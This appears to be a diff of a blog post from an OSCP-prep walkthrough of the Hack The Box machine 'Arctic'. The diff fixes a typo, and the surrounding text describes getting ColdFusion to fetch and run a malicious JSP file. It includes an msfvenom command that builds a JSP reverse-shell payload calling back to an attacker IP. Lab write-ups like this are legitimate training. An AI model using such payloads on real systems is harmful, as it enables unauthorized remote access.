dm7500/dm7500.github.io/_oscp-prep/2020-03-02-HTB-Arctic.md

 ![](/assets/htb-arctic/cf_schedualed_tasks.png)

-As you can see, it appears to try to pull form the URL we specify at the interval we set.
+As you can see, it appears to try to pull from the URL we specify at the interval we set.
 By default, ColdFusion runs `*.cfm` extensions, but will also run JSP files.
 We can create a malicious JSP file with `msfvenom`, using the below code.

 ```
 msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.34 lport=7500 -f raw > shell.jsp